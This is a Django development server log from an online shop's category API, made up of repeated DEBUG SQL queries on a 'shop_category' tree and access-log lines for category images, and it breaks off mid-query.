140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 21:15:00,558 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 21:15:00,562 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 21:15:00,566 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 21:15:00,572 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 21:15:00,576 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 21:15:00,579 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-31 21:15:00,583 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 21:15:00,586 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-31 21:15:00,590 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-31 21:15:00,595 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-31 21:15:00,599 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-31 21:15:00,603 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-31 21:15:00,610 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-31 21:15:00,614 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-31 21:15:00,620 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-31 21:15:00,624 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-31 21:15:00,628 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-31 21:15:00,632 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-31 21:15:00,636 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-31 21:15:00,642 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-31 21:15:00,646 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-31 21:15:00,650 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-31 21:15:00,654 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-31 21:15:00,658 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-31 21:15:00,662 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-31 21:15:00,667 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-31 21:15:00,670 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-31 21:15:00,674 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-31 21:15:00,679 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-31 21:15:00,683 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [31/Dec/2019 21:15:00] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [31/Dec/2019 21:15:00] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [31/Dec/2019 21:15:00] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [31/Dec/2019 21:15:00] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [31/Dec/2019 21:15:00] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [31/Dec/2019 21:15:00] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [31/Dec/2019 21:15:00] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [31/Dec/2019 21:15:02] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [31/Dec/2019 21:15:02] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [31/Dec/2019 21:15:02] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [31/Dec/2019 21:15:02] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [31/Dec/2019 21:15:02] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [31/Dec/2019 21:15:02] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [31/Dec/2019 21:15:02] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [31/Dec/2019 21:15:02] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [31/Dec/2019 21:15:03] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [31/Dec/2019 21:15:03] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [31/Dec/2019 21:15:03] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [31/Dec/2019 21:15:03] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [31/Dec/2019 21:15:03] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [31/Dec/2019 21:15:03] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [31/Dec/2019 21:15:03] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [31/Dec/2019 21:15:03] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [31/Dec/2019 21:15:03] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [31/Dec/2019 21:15:04] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [31/Dec/2019 21:15:05] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [31/Dec/2019 21:15:05] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [31/Dec/2019 21:15:05] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 DEBUG 2019-12-31 21:15:14,851 utils 2749 140297222735616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-31 21:15:14,859 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 21:15:14,865 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-31 21:15:14,868 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-31 21:15:14,873 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-31 21:15:14,876 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-31 21:15:14,879 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-31 21:15:14,881 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-31 21:15:14,884 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-31 21:15:14,889 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-31 21:15:14,892 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-31 21:15:14,895 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-31 21:15:14,898 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-31 21:15:14,901 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-31 21:15:14,906 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-31 21:15:14,910 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-31 21:15:14,916 utils 2749 140297222735616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-31 21:15:14,920 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-31 21:15:14,923 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-31 21:15:14,927 utils 2749 140297212245760 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-31 21:15:14,931 utils 2749 140297222735616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-31 21:15:14,934 utils 2749 140297212245760 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-31 21:15:14,936 utils 2749 140297222735616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-31 21:15:14,939 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) [31/Dec/2019 21:15:14] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-31 21:15:14,942 utils 2749 140297222735616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-31 21:15:14,945 utils 2749 140297222735616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", 